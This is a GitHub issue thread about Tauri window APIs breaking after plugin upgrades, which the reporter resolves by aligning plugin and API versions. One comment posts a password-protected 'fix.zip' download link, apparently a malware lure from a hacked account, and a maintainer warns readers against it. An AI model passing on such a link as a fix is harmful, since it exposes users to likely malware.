### ISSUE TITLE
[bug] Had problem with window API after update Cargo.lock

### ISSUE THREAD

**Issue by HuakunShen** [tauri-apps/tauri#10782]
### Describe the bug

The only thing I changed was upgrading `tauri-plugin-updater` from  "2.0.0-beta.10" to "2.0.0-rc.1"

Then I get error while calling window-related APIs

```
Unhandled Promise Rejection: TypeError: undefined is not an object (evaluating 'window.__TAURI_INTERNALS__.metadata.windows.map')
```

However, it doesn't seem to be the problem with the updater plugin. Upgrading another plugin also caused this error.

`window.__TAURI_INTERNALS__.metadata.windows` is undefined. 

### Full `tauri info` output

```text
WARNING: no lock files found, defaulting to npm

[✔] Environment
    - OS: Mac OS 15.0.0 X64
    ✔ Xcode Command Line Tools: installed
    ✔ rustc: 1.79.0 (129f3b996 2024-06-10)
    ✔ cargo: 1.79.0 (ffa9cf99a 2024-06-03)
    ✔ rustup: 1.27.1 (54dd3d00f 2024-04-24)
    ✔ Rust toolchain: stable-aarch64-apple-darwin (default)
    - node: 22.4.1
    - pnpm: 9.8.0
    - npm: 10.8.1
    - bun: 1.1.27

[-] Packages
    - tauri [RUST]: 2.0.0-rc.6
    - tauri-build [RUST]: 2.0.0-rc.6
    - wry [RUST]: 0.42.0
    - tao [RUST]: 0.29.1
    - @tauri-apps/api [NPM]: 2.0.0-rc.0
    - @tauri-apps/cli [NPM]: 2.0.0-rc.3

[-] App
    - build-type: bundle
    - CSP: unset
    - frontendDist: ../dist
    - devUrl: http://localhost:3000/
    - framework: Vue.js (Nuxt)
    - bundler: Webpack
```
```


### Stack trace

_No response_

### Additional context

_No response_

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HuakunShen** [comment]
This error happens when `getAllWindows()` is called. 

In the working version `window.__TAURI_INTERNALS__.metadata.windows` should give something like
`[{label: "main"}]`

While after Cargo.lock is updated, it becomes `undefined`

**Comment by HuakunShen** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

What is this?

**Comment by FabianLars** [comment]
Please do not download the file, we're currently being targetted by i assume hacked accounts.

**Comment by FabianLars** [comment]
On topic: Can you update the npm packages (for the plugins and the main api) package to the latest version too?

**Comment by HuakunShen** [comment]
> On topic: Can you update the npm packages (for the plugins and the main api) package to the latest version too?

I did try but didn't seem to help. I will keep trying. 

But there seems to be a problem installing tauri plugins with `tauri add ...`

I always get `Error Failed to install NPM dependency`.

```
❯ pnpm tauri add global-shortcut

> tauri-app@0.1.0 tauri /Users/hacker/Desktop/tauri-app
> tauri "add" "global-shortcut"

    Info Installing Cargo dependency "tauri-plugin-global-shortcut"...
    Info Installing NPM dependency "@tauri-apps/plugin-global-shortcut@2.0.0-rc"...
    Error Failed to install NPM dependency
 ELIFECYCLE  Command failed with exit code 1.
```

Looks like the version is wrong.
Manually installing `@tauri-apps/plugin-global-shortcut@2.0.0-rc` also gives error.
Setting version to 2.0.0-rc.0 works.

I believe there is a bug in https://github.com/tauri-apps/create-tauri-app

This plugin installation error happens on both my mac and ubuntu.

**Comment by HuakunShen** [comment]
@FabianLars Thank you problem solved by manually upgrading all tauri plugins from beta to rc.

But the `tauri add` command still seems to be broken.

**Comment by HuakunShen** [comment]
I got the error again. All js plugin packages are updated to the latest version.

**Comment by HuakunShen** [comment]
Problem solved again. I also upgraded the api in my tauri plugins.
I also had to use the same version for all packages due to a breaking change in the API.

`getAllWindows` returns `Window[]` in rc.0 and a Promise in rc.3

<img width="643" alt="image" src="https://github.com/user-attachments/assets/f72b7fb5-4ed4-4430-9c85-a19982549af8">
